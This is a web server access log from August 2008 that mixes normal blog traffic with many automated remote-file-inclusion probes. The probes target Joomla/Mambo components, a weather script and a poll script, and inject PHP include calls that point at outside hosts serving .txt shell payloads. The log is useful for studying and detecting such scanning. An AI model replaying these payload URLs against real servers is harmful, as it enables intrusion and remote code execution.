217.23.156.220 - - [12/Aug/2008:11:20:56 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:20:57 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:21:03 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:21:06 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:21:11 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:21:12 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:21:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:21:31 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:33 -0700] "GET / HTTP/1.1" 200 18253 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:33 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:33 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:33 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:33 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:34 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&205 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:35 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&855 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:35 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0048.jpg HTTP/1.1" 200 344028 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:36 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.1" 200 364812 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:21:38 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:21:38 -0700] "GET /logs/access_080308.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 917504 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 1769472 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3080192 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 2555904 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 1900544 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [12/Aug/2008:11:21:39 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 524288 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:21:39 -0700] "GET /logs//index2.php?content=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:21:40 -0700] "GET //index2.php?content=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:21:41 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.200.196.120 - - [12/Aug/2008:11:21:43 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.196.120 - - [12/Aug/2008:11:21:45 -0700] "GET //index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.196.120 - - [12/Aug/2008:11:21:46 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:21:57 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:21:57 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:22:05 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:22:05 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:22:06 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:09 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:09 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:11 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:13 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:22:16 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:17 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:22:19 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18559 "-" "libwww-perl/5.810" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:19 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:21 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:22 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:22:23 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paijoe.007gb.com/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:24 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:22:24 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paijoe.007gb.com/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:30 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:31 -0700] "GET /logs/access_080616.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:31 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:31 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:34 -0700] "GET /logs/access_080616.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:22:38 -0700] "GET /logs/access_080315.log//error.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:22:39 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.232.156.130 - - [12/Aug/2008:11:22:39 -0700] "GET /logs/access.log//error.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:22:39 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:39 -0700] "GET /logs/access_080616.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:22:39 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:22:40 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:41 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:42 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:42 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:45 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:45 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:22:46 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.196.120 - - [12/Aug/2008:11:22:49 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.196.120 - - [12/Aug/2008:11:22:51 -0700] "GET //index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.196.120 - - [12/Aug/2008:11:22:51 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.3.133.171 - - [12/Aug/2008:11:22:53 -0700] "GET /logs/access.log//index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:22:53 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.3.133.171 - - [12/Aug/2008:11:22:54 -0700] "GET //index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.79" "www.dmulk.com"
72.3.133.171 - - [12/Aug/2008:11:22:54 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://wmsnet.net/media/in/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:22:56 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18565 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:22:57 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:22:57 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:23:10 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:11:23:12 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:11:23:12 -0700] "GET /htmltonuke.php?filnavn=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:26 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:26 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:26 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:27 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:29 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:23:32 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:23:33 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:43 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:43 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:43 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:43 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:43 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:44 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:44 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:45 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:45 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:46 -0700] "GET /logs/access_080315.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:46 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:11:23:47 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
